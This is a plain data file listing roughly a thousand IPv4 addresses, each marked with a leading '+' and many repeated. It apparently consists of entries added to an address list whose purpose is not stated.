+117.131.145.94 +42.96.170.222 +117.131.145.93 +116.7.72.122 +103.36.90.58 +125.89.67.38 +120.226.245.190 +183.57.20.59 +210.51.21.80 +220.165.9.75 +103.36.90.58 +103.36.90.58 +49.235.198.61 +125.120.253.196 +61.219.81.101 +218.1.100.235 +124.220.4.242 +47.101.178.8 +220.160.52.213 +36.32.191.42 +116.62.7.174 +183.224.71.173 +120.209.82.248 +183.63.182.188 +183.234.151.243 +120.78.159.216 +106.12.241.132 +106.12.241.133 +211.75.183.11 +119.3.25.72 +183.15.206.112 +58.247.111.13 +219.139.148.5 +113.105.203.108 +103.36.90.58 +101.95.21.178 +103.36.90.58 +112.81.63.243 +218.16.129.171 +103.36.90.58 +101.200.176.11 +113.116.126.243 +39.153.251.159 +182.92.241.35 +118.186.244.242 +139.196.198.125 +219.146.165.142 +121.13.252.164 +222.185.251.42 +150.242.238.7 +125.91.233.182 +110.80.1.70 +116.7.72.178 +211.140.29.42 +210.51.21.79 +1.192.217.116 +219.131.198.93 +117.184.125.89 +183.62.177.82 +219.138.127.14 +103.36.90.58 +47.102.84.124 +116.128.228.13 +47.100.0.79 +120.237.118.132 +124.222.34.242 +124.222.235.114 +60.174.128.86 +143.89.138.2 +47.100.182.26 +60.30.26.217 +61.181.111.162 +106.53.145.170 +183.149.246.115 +114.225.23.212 +220.128.84.98 +103.36.90.58 +103.36.90.45 +113.107.155.229 +47.103.37.193 +58.243.104.26 +163.177.103.163 +143.89.138.2 +221.224.249.34 +180.113.22.160 +125.74.219.12 +116.22.199.79 +121.18.68.215 +103.36.90.58 +218.23.185.20 +103.36.90.58 +125.89.35.118 +114.116.47.69 +222.77.183.67 +39.103.218.217 +210.51.21.33 +59.37.171.156 +60.172.48.193 +122.159.45.107 +111.26.178.69 +222.82.233.138 +60.30.52.205 +223.220.154.203 +61.189.223.215 +124.128.8.188 +61.164.80.130 +221.4.210.180 +183.214.181.133 +14.126.206.59 +183.62.233.113 +210.5.23.52 +101.37.169.10 +124.134.14.144 +113.106.103.32 +39.107.87.29 +59.46.25.29 +211.136.182.25 +116.247.77.217 +125.107.160.176 +122.225.64.9 +36.133.219.183 +111.26.178.75 +113.108.138.211 +117.141.159.125 +120.194.49.246 +218.75.223.247 +125.120.249.251 +101.37.169.10 +124.117.210.154 +222.174.89.26 +118.163.52.123 +59.69.208.38 +183.214.173.230 +61.143.157.132 +121.40.150.225 +45.121.52.114 +116.62.196.220 +117.9.124.196 +183.230.36.27 +121.40.150.225 +81.70.105.149 +120.236.109.99 +183.192.160.93 +118.163.147.155 +113.116.180.246 +183.192.160.94 +47.103.147.248 +111.26.178.75 +222.90.136.116 +110.80.45.30 +103.36.90.58 +112.6.36.11 +117.131.145.95 +61.216.49.237 +112.111.1.132 +221.130.126.150 +139.170.8.97 +111.26.178.75 +111.26.178.69 +58.222.133.166 +222.134.52.200 +123.157.233.194 +61.181.112.18 +139.196.198.125 +123.138.180.142 +120.204.247.42 +113.102.141.37 +117.159.34.15 +202.100.206.166 +101.37.169.10 +101.89.139.21 +121.5.28.247 +120.79.167.105 +223.68.139.28 +101.37.247.40 +218.1.100.235 +112.30.157.122 +61.129.71.54 +221.130.79.150 +47.112.197.40 +180.109.127.164 +222.66.79.116 +47.106.15.235 +47.102.135.51 +183.62.131.66 +103.36.90.58 +119.60.5.198 +220.180.111.10 +116.6.106.131 +116.7.74.1 +61.93.207.122 +112.74.112.170 +202.103.149.11 +183.50.207.251 +103.36.90.58 +163.179.127.69 +103.36.90.58 +47.101.221.149 +113.116.90.38 +125.78.45.186 +117.57.64.165 +117.14.30.204 +121.37.198.9 +115.239.207.182 +103.36.90.54 +112.30.195.10 +101.200.82.187 +202.133.248.92 +121.5.240.104 +222.85.192.46 +103.36.90.58 +120.25.95.92 +114.220.127.208 +210.63.211.36 +103.36.90.58 +218.16.212.179 +220.189.249.54 +120.78.166.4 +183.207.196.123 +220.166.241.183 +180.141.90.61 +112.29.244.171 +110.53.162.169 +125.88.37.178 +1.119.139.243 +222.223.19.166 +210.65.139.157 +111.1.73.98 +218.198.32.204 +218.198.32.206 +36.110.122.19 +124.205.195.213 +120.79.191.162 +116.62.247.104 +218.198.32.203 +113.105.152.175 +115.29.198.7 +61.189.223.215 +120.198.22.25 +47.100.236.30 +119.146.180.29 +183.63.225.100 +125.89.35.34 +114.252.238.130 +122.228.169.150 +59.125.118.224 +121.11.17.114 +119.146.149.30 +112.29.245.125 +124.129.21.44 +60.160.129.181 +221.202.72.223 +218.18.6.227 +103.36.90.58 +150.138.216.118 +39.108.117.194 +183.149.235.59 +220.130.187.129 +103.36.90.58 +112.25.65.55 +103.36.90.58 +180.112.65.100 +175.98.127.170 +59.42.202.195 +183.57.23.180 +124.223.109.10 +183.149.236.7 +211.162.67.19 +58.242.212.193 +121.4.47.195 +47.104.17.89 +120.192.179.176 +119.23.226.149 +112.227.85.183 +218.206.140.30 +122.225.203.168 +218.206.140.125 +112.26.60.178 +202.201.64.251 +120.79.200.186 +60.214.64.50 +103.36.90.58 +52.83.102.131 +47.110.38.183 +218.75.223.247 +103.36.90.58 +112.65.117.14 +60.165.62.104 +61.191.31.26 +117.82.26.249 +113.200.77.151 +183.63.205.83 +103.36.90.58 +183.131.137.238 +125.46.3.211 +183.203.214.249 +103.36.90.58 +116.24.189.144 +203.198.152.185 +119.188.116.54 +218.29.196.220 +171.217.59.60 +113.110.201.102 +112.6.128.114 +111.26.178.69 +114.55.141.24 +120.27.152.145 +1.119.139.245 +112.74.59.163 +112.31.12.214 +103.36.90.58 +202.158.165.147 +103.36.90.58 +58.250.152.111 +59.56.175.120 +103.36.90.58 +218.202.96.154 +124.222.54.81 +106.13.17.242 +60.171.34.193 +116.7.74.206 +103.36.90.58 +61.189.243.28 +180.169.153.106 +111.59.87.35 +113.92.167.41 +113.105.152.168 +112.26.60.94 +183.17.229.98 +59.47.0.62 +180.168.195.209 +210.51.21.32 +47.103.147.248 +60.171.250.31 +118.163.165.57 +118.163.165.55 +223.13.120.22 +59.33.246.254 +121.5.180.176 +58.219.62.86 +123.13.202.225 +183.149.233.50 +101.52.236.151 +222.186.144.65 +117.30.223.211 +47.93.37.246 +112.16.203.230 +121.4.247.107 +218.90.95.202 +39.104.53.129 +218.6.146.162 +182.245.143.29 +120.79.112.135 +121.17.168.179 +223.95.210.225 +59.46.233.53 +175.24.119.235 +121.4.245.240 +121.5.114.64 +117.144.200.66 +1.15.183.174 +175.6.14.120 +118.113.146.215 +180.109.35.143 +119.23.44.93 +123.60.213.149 +220.161.145.117 +123.139.46.32 +113.116.19.226 +103.36.90.58 +103.36.90.58 +220.194.142.3 +116.7.75.234 +112.29.238.36 +47.101.56.243 +222.184.54.100 +103.36.90.58 +202.120.199.148 +112.111.2.14 +112.6.88.182 +111.26.178.75 +103.36.90.58 +180.152.157.47 +103.36.90.58 +117.30.223.148 +113.105.201.62 +113.110.203.57 +39.88.192.81 +111.26.178.69 +120.76.56.162 +103.36.90.58 +59.42.61.31 +103.36.90.58 +59.61.118.48 +115.230.119.195 +180.76.52.24 +119.23.20.233 +119.23.129.22 +14.126.204.95 +219.87.177.198 +81.68.217.101 +47.107.191.72 +183.95.255.254 +47.93.130.154 +112.112.90.162 +183.60.143.121 +112.115.17.217 +47.103.41.143 +221.130.161.52 +39.108.52.222 +60.173.113.172 +113.116.125.65 +103.36.90.58 +222.76.49.10 +183.149.246.32 +120.25.223.224 +121.238.109.212 +112.227.84.116 +180.169.154.51 +59.61.214.103 +122.116.167.81 +58.20.63.222 +120.79.179.156 +122.228.157.34 +14.126.206.121 +114.252.231.13 +219.138.229.40 +47.112.200.246 +47.106.20.6 +118.163.165.59 +118.163.165.55 +119.23.128.121 +116.236.128.77 +119.23.128.80 +61.189.43.61 +60.177.243.139 +47.112.222.53 +134.175.220.239 +103.36.90.58 +183.15.204.159 +117.30.222.114 +123.235.54.122 +221.4.214.11 +103.36.90.58 +180.112.65.124 +103.36.90.58 +103.36.90.58 +219.139.35.84 +47.119.137.189 +103.36.90.58 +111.26.178.69 +122.112.245.192 +112.54.44.17 +103.36.90.58 +58.222.88.194 +47.112.201.182 +165.84.176.75 +1.117.199.9 +111.164.173.191 +1.116.14.199 +103.36.90.58 +111.75.249.68 +103.36.90.58 +112.111.2.14 +103.36.90.58 +120.79.247.231 +47.112.167.7 +120.79.242.82 +218.75.223.247 +103.36.90.58 +112.115.17.83 +103.36.90.58 +103.36.90.58 +103.36.90.58 +202.100.211.86 +103.36.90.58 +59.42.61.211 +122.228.169.150 +103.36.90.58 +121.248.67.1 +103.36.90.58 +117.186.228.90 +220.173.143.190 +111.6.77.69 +113.116.127.4 +103.36.90.58 +114.219.155.161 +220.180.15.138 +180.109.32.62 +183.237.248.202 +123.52.55.92 +101.43.106.206 +113.116.183.68 +103.36.90.58 +221.11.70.77 +103.36.90.58 +115.194.25.152 +101.231.76.122 +180.112.169.23 +123.235.155.51 +119.60.13.98 +59.42.90.176 +103.36.90.58 +121.37.189.174 +183.49.86.153 +47.100.97.33 +116.7.75.172 +218.7.208.235 +106.14.183.225 +61.153.224.25 +125.227.102.168 +113.116.181.99 +1.15.103.232 +180.167.203.122 +112.28.19.49 +183.61.164.27 +182.245.143.132 +14.126.206.37 +103.36.90.54 +103.36.90.58 +118.113.147.87 +183.149.250.74 +103.36.90.58 +180.111.110.135 +202.105.183.240 +103.36.90.58 +103.36.90.58 +120.236.2.238 +47.115.137.107 +117.85.142.157 +103.36.90.58 +103.36.90.58 +180.168.88.68 +103.36.90.58 +103.36.90.58 +114.223.226.170 +110.87.25.207 +103.36.90.58 +183.158.30.102 +218.7.208.235 +103.36.90.58 +103.36.90.58 +180.76.49.221 +111.164.174.134 +180.166.26.202 +42.194.226.30 +111.45.123.151 +111.45.123.143 +113.69.149.158 +222.24.62.83 +60.26.89.0 +120.76.102.204 +116.228.123.169 +103.36.90.58 +39.108.5.76 +162.14.131.47 +220.166.243.158 +103.36.90.58 +47.99.58.90 +220.160.52.54 +103.36.90.58 +47.99.58.90 +120.79.92.20 +111.62.32.82 +111.62.32.83 +218.90.94.130 +47.99.216.159 +113.116.126.139 +117.84.208.57 +183.149.231.231 +119.129.115.242 +119.23.140.2 +183.162.253.64 +103.36.90.58 +103.36.90.58 +47.99.53.133 +106.52.135.170 +103.36.90.58 +119.23.184.20 +60.173.184.226 +119.145.248.9 +113.65.194.9 +180.166.26.202 +218.86.39.126 +52.80.21.212 +221.179.119.18 +60.189.111.194 +103.36.90.58 +163.29.17.157 +112.111.2.14 +117.56.218.157 +14.155.222.158 +120.26.199.26 +222.186.144.20 +111.59.117.11 +150.158.159.132 +210.243.86.75 +139.9.37.175 +103.36.90.58 +59.61.122.100 +103.36.90.58 +103.36.90.58 +115.203.15.184 +103.36.90.58 +120.78.222.152 +183.148.231.254 +103.36.90.58 +119.23.125.88 +103.36.90.58 +114.223.225.163 +120.26.63.125 +47.107.159.134 +183.149.252.250 +119.146.237.210 +202.104.2.215 +220.166.243.148 +120.24.76.114 +47.115.81.91 +103.36.90.58 +119.127.17.248 +111.164.178.108 +103.36.90.58 +103.36.90.58 +119.146.59.58 +119.23.147.91 +112.54.44.17 +111.26.178.69 +81.70.243.183 +183.149.255.172 +117.24.139.46 +60.10.25.27 +120.224.127.77 +103.36.90.58 +103.36.90.58 +60.31.125.54 +103.36.90.58 +120.78.86.214 +222.240.19.131 +183.15.206.111 +47.107.101.30 +103.36.90.58 +117.9.105.15 +103.36.90.58 +113.116.182.78 +125.119.147.201 +116.54.81.219 +183.15.88.131 +60.215.252.248 +220.170.155.240 +150.138.113.155 +180.113.43.85 +117.30.223.69 +183.136.124.36 +116.30.197.246 +103.36.90.58 +180.111.137.194 +111.164.176.190 +103.36.90.58 +111.26.178.75 +122.112.245.192 +117.141.34.29 +120.76.47.76 +103.36.90.58 +218.90.94.81 +183.128.150.154 +220.166.240.151 +14.155.222.223 +117.172.79.242 +222.174.57.170 +183.62.67.172 +183.149.253.168 +114.251.38.75 +162.105.209.146 +183.17.230.78 +101.230.193.62 +47.106.70.253 +120.76.53.91 +183.14.77.201 +113.116.16.46 +120.76.53.110 +103.36.90.58 +103.36.90.58 +120.25.121.18 +117.24.76.186 +103.36.90.58 +60.189.112.167 +114.223.225.51 +113.102.145.80 +59.120.78.225 +58.246.227.150 +36.110.139.234 +202.113.110.31 +180.112.159.69 +222.82.243.5 +180.109.34.90 +119.23.21.123 +119.23.188.38 +180.112.65.125 +218.26.234.155 +115.159.117.226 +120.76.208.45 +218.28.220.122 +113.0.243.90 +120.77.60.94 +203.198.186.69 +103.36.90.58 +103.36.90.58 +218.75.82.22 +103.36.90.58 +218.17.116.133 +120.25.121.18 +103.36.90.58 +114.252.226.12 +218.57.132.112 +116.7.73.81 +14.126.205.155 +120.77.102.223 +113.116.126.152 +124.202.169.110 +116.7.74.87 +183.149.252.101 +1.192.217.116 +111.164.173.78 +110.87.25.228 +103.36.90.58 +103.36.90.58 +115.219.3.17 +119.23.173.119 +103.36.90.58 +119.129.118.233 +103.36.90.58 +113.105.203.51 +120.77.59.103 +103.36.90.58 +103.36.90.58 +110.186.72.53 +103.36.90.58 +106.39.229.148 +1.119.174.218 +103.36.90.58 +103.36.90.58 +114.223.226.203 +124.88.188.199 +183.63.121.149 +59.61.122.81 +116.7.73.216 +103.36.90.58 +113.98.116.192 +218.61.235.58 +116.7.72.231 +103.36.90.58 +103.36.90.58 +47.107.182.50 +116.7.75.218 +180.163.104.57 +61.141.139.11 +120.77.58.76 +61.141.138.80 +39.108.88.170 +113.105.202.81 +103.36.90.58 +39.108.195.84 +124.205.195.213 +219.153.39.135 +106.52.115.145 +125.112.46.91 +123.124.57.175 +61.161.152.98 +125.74.119.88 +59.108.16.228 +117.24.77.214 +183.149.234.38 +180.113.23.81 +8.129.116.213 +103.36.90.58 +119.166.14.161 +117.30.223.151 +116.247.77.62 +123.56.21.234 +103.36.90.58 +220.166.241.28 +120.77.68.39 +103.36.90.58 +103.36.90.58 +120.24.168.60 +120.78.234.100 +114.252.234.35 +122.146.219.245 +117.158.152.33 +61.141.139.154 +59.61.122.39 +103.36.90.58 +219.142.128.15 +119.135.178.58 +202.205.9.13 +221.213.63.227 +111.205.88.136 +120.133.21.147 +183.214.173.230 +60.176.8.213 +103.36.90.58 +222.161.223.196 +183.230.38.242 +36.110.174.82 +103.36.90.58 +118.143.40.59 +116.7.249.82 +223.220.175.67 +120.78.228.251 +153.0.175.7 +112.254.92.195 +218.20.197.185 +113.90.135.147 +218.5.2.251 +110.87.25.148 +121.225.65.141 +39.108.194.99 +183.149.254.82 +103.36.90.58 +220.160.52.54 +120.78.193.86 +114.255.132.229 +113.116.19.136 +60.13.241.95 +103.36.90.58 +117.15.60.125 +103.36.90.58 +103.36.90.58 +119.61.7.12 +47.106.84.182 +1.116.179.21 +118.113.147.107 +183.15.205.196 +103.36.90.58 +183.17.229.242 +218.0.170.16 +14.126.205.204 +183.149.227.177 +120.76.112.179 +117.24.137.211 +59.42.63.120 +118.163.165.59 +183.63.8.126 +134.175.220.239 +113.116.126.153 +47.106.156.144 +218.83.233.90 +114.224.142.201 +120.77.22.217 +121.238.100.187 +117.158.73.181 +218.90.93.117 +113.119.8.56 +117.30.223.39 +120.77.69.167 +39.103.218.217 +113.116.126.175 +103.36.90.58 +60.26.75.95 +1.14.65.53 +103.36.90.58 +120.76.45.94 +183.149.244.36 +180.113.42.30 +120.76.211.73 +119.129.115.144 +112.74.175.208 +112.6.114.175 +223.247.218.4 +103.36.90.58 +211.136.182.25 +222.217.68.117 +202.91.248.87 +114.225.21.149 +47.106.163.147 +112.255.100.52 +8.129.45.85 +218.65.189.46 +182.150.57.94 +59.61.122.248 +119.23.221.10 +202.91.236.87 +106.14.250.74 +120.25.210.238 +121.235.76.22 +183.149.246.134 +116.247.77.61 +210.242.68.225 +120.77.59.131 +8.129.35.203 +202.91.236.87 +58.20.63.222 +60.212.43.253 +202.91.248.87 +115.218.219.85 +120.76.237.221 +103.36.90.58 +59.125.124.196 +202.108.28.15 +61.181.45.114 +120.76.46.125 +49.77.42.50 +122.225.221.42 +202.108.28.15 +125.69.92.165 +183.149.240.88 +121.238.100.204 +39.129.90.216 +39.98.37.95 +222.169.94.16 +193.112.112.30 +120.77.68.250 +58.211.212.115 +103.36.90.58 +117.84.208.108 +183.149.253.142 +120.77.68.37 +117.158.24.187 +223.68.128.220 +47.107.34.220 +103.36.90.58 +116.7.73.92 +120.77.58.52 +47.107.68.58 +220.166.243.80 +113.116.126.190 +220.160.52.54 +120.77.93.158 +116.7.73.164 +58.213.22.146 +183.149.229.207 +114.225.21.167 +183.63.149.4 +116.7.72.157 +14.215.218.106 +61.141.138.173 +180.169.95.137 +183.49.86.211 +103.36.90.58 +117.10.61.242 +124.223.119.181 +113.105.203.13 +60.189.118.185 +180.76.125.32 +183.17.230.153 +39.129.16.141 +111.160.226.43 +60.176.9.195 +113.106.194.20 +125.46.26.5 +114.67.108.97 +47.106.228.32 +116.62.142.137 +116.62.142.137 +119.23.223.111 +113.106.22.37 +103.159.124.158 +117.30.223.48 +122.112.245.192 +114.223.78.129 +111.26.100.252 +218.72.86.238 +47.107.74.119 +113.106.22.37 +27.128.201.239 +134.175.97.128 +116.135.67.19 +113.110.201.83 +183.149.245.213 +120.77.58.149 +123.157.218.11 +60.176.8.140 +58.222.88.194 +221.195.128.42 +120.209.4.22 +120.77.53.12 +221.212.34.204 +1.119.197.178 +59.61.122.232 +113.116.124.66 +222.77.102.5 +123.235.154.159 +180.113.41.224 +222.243.165.102 +47.106.201.91 +125.112.41.149 +113.116.124.46 +113.102.130.255 +113.105.202.244 +220.166.241.162 +47.106.236.111 +103.36.90.58 +103.36.90.58 +111.164.183.195 +114.252.237.237 +60.165.152.58 +116.7.73.143 +103.36.90.58 +120.76.23.112 +117.8.64.32 +125.89.35.116 +47.106.243.234 +59.42.63.12 +116.228.172.182 +113.110.203.17 +139.198.191.15 +119.23.108.35 +222.82.132.175 +61.54.97.209 +8.129.83.159 +110.87.24.18 +114.225.22.125 +183.149.240.218 +202.105.183.153 +125.89.34.208 +111.26.178.69 +114.225.216.56 +47.115.112.128 +183.129.182.28 +120.77.105.224 +112.115.17.147 +182.136.166.37 +120.77.72.73 +113.116.219.195 +113.103.38.238 +112.253.1.119 +113.88.141.173 +118.113.147.14 +47.107.39.141 +223.71.226.116 +222.240.19.131 +125.72.100.30 +52.80.16.140 +59.61.122.85 +47.110.240.159 +183.14.78.112 +118.31.103.155 +113.116.127.225 +111.167.57.139 +42.192.205.80 +218.25.120.108 +58.219.62.80 +111.26.178.75 +103.36.90.58 +120.77.160.204 +113.108.116.101 +183.149.232.3 +117.85.142.185 +125.89.35.68 +60.220.253.156 +112.112.90.238 +103.36.90.58 +106.112.128.51 +121.41.80.94 +58.213.63.170 +47.107.41.27 +121.201.56.39 +220.166.242.230 +116.7.75.230 +61.179.246.235 +113.65.194.231 +120.77.105.154 +117.89.94.224 +47.106.203.35 +125.89.32.226 +139.159.151.54 +114.252.234.252 +116.30.198.107 +49.72.133.20 +113.103.39.41 +116.54.81.130 +114.225.23.199 +101.34.142.142 +113.116.180.190 +183.149.249.26 +8.129.45.162 +49.65.113.195 +27.17.58.86 +103.36.90.58 +124.172.246.189 +183.49.86.222 +116.54.81.102 +113.116.124.92 +183.14.76.64 +180.142.178.40 +183.15.204.163 +47.106.105.77 +183.17.230.254 +113.116.182.85 +121.4.247.66 +221.226.162.244 +221.131.184.194 +47.99.186.107 +116.128.228.13 +221.195.144.144 +180.168.195.211 +47.107.43.94 +113.116.219.98 +113.92.167.4 +183.149.255.206 +222.77.102.112 +116.54.81.128 +119.57.173.20 +101.200.74.118 +115.236.19.67 +47.110.240.159 +58.128.138.3 +221.195.144.144 +59.42.62.15 +183.14.78.27 +117.85.143.244 +220.166.242.161 +210.177.175.188 +36.7.74.128 +120.77.105.148 +49.65.114.115 +125.89.33.66 +223.247.34.249 +115.219.7.1 +211.102.219.243 +47.106.207.180 +211.102.219.245 +120.132.8.188 +60.250.81.38 +120.24.1.234 +124.126.224.48 +183.136.124.169 +119.127.17.239 +221.195.128.42 +183.128.148.188 +36.112.71.138 +117.15.67.213 +116.54.81.220 +139.159.157.170 +114.55.250.251 +218.76.65.100 +182.151.205.217 +218.89.108.204 +112.124.65.12 +116.229.196.247 +113.118.74.255 +139.196.34.215 +112.73.81.245 +8.141.144.156 +103.36.90.58 +183.149.235.135 +222.77.101.240 +106.12.240.166 +58.48.75.98 +8.129.47.128 +59.42.63.70 +185.209.40.205 +47.98.40.27 +60.189.118.152 +39.106.132.211 +112.112.90.53 +112.73.81.245 +122.224.120.93 +115.174.67.210 +114.223.226.31 +123.124.57.172 +101.201.63.155 +120.77.170.10 +112.73.81.227 +220.166.243.77 +115.239.240.114 +116.54.57.208 +60.215.242.145 +117.9.107.231 +54.223.38.232 +113.116.125.168 +223.241.247.198 +111.43.108.164 +183.14.79.202 +60.191.195.114 +202.96.99.37 +112.73.81.245 +183.95.255.254 +117.9.104.100 +103.36.90.58 +110.87.24.43 +124.116.176.73 +60.215.251.179 +112.73.81.245 +220.173.139.43 +218.28.179.195 +115.174.67.253 +116.7.73.53 +61.93.249.10 +183.136.111.104 +110.42.220.130 +60.189.114.22 +103.36.90.58 +47.106.200.113 +8.129.45.85 +218.84.182.197 +220.130.199.131 +111.198.141.10 +110.86.5.194 +115.218.127.43 +116.54.57.21 +220.178.116.66 +120.24.183.51 +52.83.102.131 +183.149.228.76 +124.226.214.213 +61.178.118.17 +14.126.207.215 +222.66.235.230 +36.158.71.198 +61.141.138.97 +183.149.248.218 +220.166.241.62 +123.118.79.25 +120.41.150.167 +218.201.127.142 +125.89.35.121 +122.4.214.65 +218.59.39.43 +112.115.17.149 +120.77.253.42 +113.119.8.149 +202.202.1.175 +120.197.179.107 +39.108.172.157 +103.36.90.58 +183.148.237.83 +120.24.81.25 +112.73.81.245 +49.64.188.42 +125.89.32.23 +18.167.166.134 +116.54.81.115 +202.202.1.138 +116.54.81.235 +114.223.76.213 +120.41.151.47 +120.78.14.122 +222.77.102.208 +103.36.90.58 +125.46.3.211 +112.73.81.245 +218.11.132.33 +180.101.105.146 +112.73.81.227 +122.143.203.19 +103.36.90.58 +183.148.233.24 +120.77.252.54 +59.42.90.255 +218.70.111.19 +125.122.8.162 +47.102.110.163 +43.247.68.246 +183.148.233.24 +125.89.32.13 +219.148.25.99 +61.220.249.251 +220.130.187.129 +47.114.110.88 +144.123.27.90 +183.14.78.89 +180.112.169.124 +113.105.203.162 +125.69.90.125 +118.26.166.94 +106.12.146.180 +116.7.74.67 +115.219.0.184 +183.148.235.85 +112.226.15.120 +222.77.100.126 +114.223.78.11 +180.112.171.66 +183.149.255.151 +117.40.9.27 +14.126.204.178 +218.71.136.172 +122.143.203.19 +122.245.81.245 +116.7.72.200 +16.163.156.249 +220.249.21.78 +60.220.238.170 +59.172.37.103 +219.142.105.44 +47.108.90.11 +185.209.40.210 +101.34.48.147 +211.75.183.11 +183.148.235.85 +180.113.43.236 +112.73.81.227 +117.30.222.245 +125.107.151.180 +220.130.187.130 +113.88.124.56 +47.104.21.77 +211.155.228.43 +211.155.228.43 +183.148.237.193 +61.141.139.60 +180.163.175.1 +218.27.6.141 +18.167.42.29 +118.113.146.147 +117.30.223.15 +125.116.40.90 +218.241.213.53 +118.163.165.55 +118.163.165.57 +124.219.70.194 +106.14.159.154 +61.130.247.14 +115.29.64.149 +124.71.62.161 +14.126.207.116 +60.177.242.199 +180.175.153.18 +60.210.117.117 +114.102.185.150 +183.14.76.89 +180.142.178.81 +124.71.56.137 +120.24.64.254 +112.91.83.46 +112.30.213.102 +47.102.220.127 +103.36.90.58 +219.131.221.234 +183.14.79.213 +61.189.223.215 +39.97.237.41 +222.128.26.227 +210.243.86.48 +106.55.9.224 +112.115.17.64 +112.115.17.49 +113.116.124.64 +219.136.186.125 +182.61.130.94 +183.148.227.221 +183.148.227.221 +60.6.202.4 +114.224.143.25 +36.26.207.215 +120.224.18.4 +47.112.198.69 +180.109.39.25 +101.132.34.13 +106.14.186.192 +49.233.82.126 +59.61.118.108 +116.7.73.76 +59.48.144.170 +116.7.72.117 +112.73.81.245 +112.73.81.227 +211.141.192.230 +120.224.18.4 +116.7.72.90 +115.174.67.169 +115.219.5.122 +114.217.115.194 +125.89.32.87 +223.68.139.28 +222.77.103.226 +121.199.14.162 +117.84.209.10 +183.149.238.220 +103.13.247.5 +36.25.165.150 +103.36.90.58 +112.226.15.120 +220.166.241.174 +113.110.203.4 +114.215.84.111 +113.200.57.203 +118.190.211.179 +103.36.90.58 +114.252.238.142 +113.118.72.180 +218.241.213.53 +218.241.236.170 +183.148.232.215 +122.233.8.234 +113.89.234.65 +120.224.18.4 +120.224.18.4 +119.2.3.150 +18.166.68.32 +60.26.83.228 +111.198.137.32 +117.186.236.132 +120.79.14.33 +120.92.169.230 +8.135.39.172 +103.36.90.58 +115.174.67.252 +116.25.135.211 +106.14.10.5 +116.7.72.163 +116.7.75.103 +122.112.245.192 +183.128.148.94 +116.7.73.153 +116.7.72.82 +113.105.203.180 +183.138.132.106 +114.225.23.235 +183.149.251.127 +110.87.25.117 +118.116.127.161 +218.63.77.158 +39.106.129.210 +59.42.90.166 +116.9.30.203 +183.136.120.156 +47.99.215.167 +183.49.45.226 +183.148.226.116 +180.168.192.15 +120.224.18.4 +117.64.147.186 +101.43.56.7 +47.100.187.31 +120.79.164.177 +218.32.11.26 +218.32.11.33 +218.32.11.94 +218.32.11.64 +125.75.126.153 +116.7.75.158 +110.40.156.53 +103.36.90.58 +59.48.144.170 +123.56.95.210 +124.117.211.178 +116.30.196.181 +183.158.25.180 +183.214.181.133 +103.36.90.58 +103.36.90.58 +218.28.244.229 +180.167.145.166 +18.162.153.84 +183.148.239.158 +60.176.61.96 +120.25.150.192 +116.7.73.10 +113.69.137.157 +113.105.203.211 +116.7.75.68 +115.219.77.36 +115.238.97.2 +220.166.242.131 +120.24.252.149 +123.163.54.146 +14.155.221.195 +222.178.41.85 +47.242.196.136 +39.107.61.240 +202.101.109.137 +180.169.248.12 +118.163.155.210 +120.79.156.5 +120.224.18.4 +118.26.166.93 +116.7.72.167 +116.7.72.63 +115.238.146.7 +218.75.24.164 +47.112.0.70 +47.101.56.241 +42.193.99.146 +49.232.160.201 +82.156.9.189 +114.132.199.115 +119.91.225.95 +119.91.223.151 +152.136.149.169 +49.232.24.215 +119.91.199.206 +101.43.13.163 +150.158.21.235 +81.70.166.60 +81.70.54.251 +81.70.164.48 +113.108.255.223 +114.252.235.179 +119.91.23.189 +182.61.130.215 +8.135.1.235 +115.192.83.232 +101.132.177.144 +122.112.245.192 +113.105.201.101 +116.7.72.58 +122.112.245.192 +115.218.124.191 +218.241.213.53 +112.74.212.146 +118.113.146.95 +113.62.191.84 +113.62.191.119 +210.75.20.137 +47.101.61.146 +59.42.231.218 +112.73.81.227 +113.105.201.36 +116.7.75.54 +121.225.64.165 +112.27.60.236 +116.236.205.84 +59.108.91.231 +125.215.157.172 +116.7.72.238 +110.87.24.86 +124.119.14.250 +16.162.46.254 +113.105.202.58 +115.219.72.26 +116.7.75.108 +116.7.72.48 +111.166.240.242 +116.25.132.103 +114.251.49.141 +183.14.77.173 +139.129.204.232 +122.112.245.192 +124.202.169.110 +112.74.162.209 +113.119.8.50 +119.91.209.91 +115.219.4.193 +34.81.233.243 +218.241.213.53 +183.143.8.159 +115.219.74.25 +220.184.242.241 +112.73.81.227 +117.15.213.7 +116.7.74.231 +18.166.213.104 +59.42.62.116 +112.74.61.60 +183.138.142.120 +171.35.128.196 +112.111.6.62 +101.226.171.218 +112.73.81.245 +112.73.81.227 +113.116.126.108 +120.79.225.230 +120.26.199.26 +121.43.182.77 +36.7.191.159 +180.76.124.123 +60.205.176.175 +103.36.90.58 +106.39.229.133 +113.118.72.52 +125.89.35.108 +111.166.243.7 +47.101.52.74 +120.25.73.126 +58.216.51.50 +122.4.214.65 +123.235.152.113 +60.189.125.60 +47.100.218.182 +119.129.113.161 +171.217.59.165 +18.163.49.197 +18.167.173.143 +120.25.103.185 +125.89.34.8 +203.193.50.149 +103.36.90.58 +218.5.2.187 +218.241.213.53 +115.174.67.249 +112.74.112.170 +113.118.73.166 +106.46.169.232 +218.94.21.189 +47.101.60.76 +220.173.140.142 +120.76.135.41 +113.110.203.233 +59.61.118.61 +116.7.74.181 +124.130.130.166 +116.7.75.19 +222.82.134.171 +118.114.243.129 +218.203.161.162 +210.47.17.29 +8.135.28.137 +120.79.175.182 +59.61.122.61 +218.91.48.235 +120.78.212.56 +180.168.67.66 +47.108.75.16 +114.247.50.139 +103.36.90.58 +60.162.161.38 +113.116.219.206 +222.77.100.233 +119.166.244.97 +47.100.45.203 +59.48.129.142 +182.61.130.94 +49.232.8.102 +81.68.78.222 +81.68.199.60 +139.129.200.203 +1.12.227.243 +47.106.128.165 +121.40.82.148 +121.40.57.239 +183.14.77.12 +125.89.34.149 +222.25.177.73 +183.17.231.94 +115.208.228.180 +183.49.86.171 +36.26.229.77 +220.166.242.76 +36.26.231.87 +61.153.30.93 +47.97.211.85 +114.55.28.69 +183.15.88.213 +183.15.125.18 +183.136.127.67 +121.34.49.58 +106.14.144.142 +116.30.198.100 +180.109.37.125 +115.219.4.196 +36.26.230.243 +47.98.151.197 +59.51.114.216 +60.189.116.107 +47.97.67.208 +61.153.254.158 +180.168.67.66 +115.238.97.4 +116.128.228.13 +183.6.178.36 +112.124.29.77 +60.27.196.87 +111.164.181.114 +39.108.68.200 +120.197.146.137 +119.129.116.168 +113.118.75.132 +119.129.115.91 +183.62.67.171 +182.136.222.60 +120.76.239.208 +61.49.250.118 +183.148.231.30 +125.46.30.42 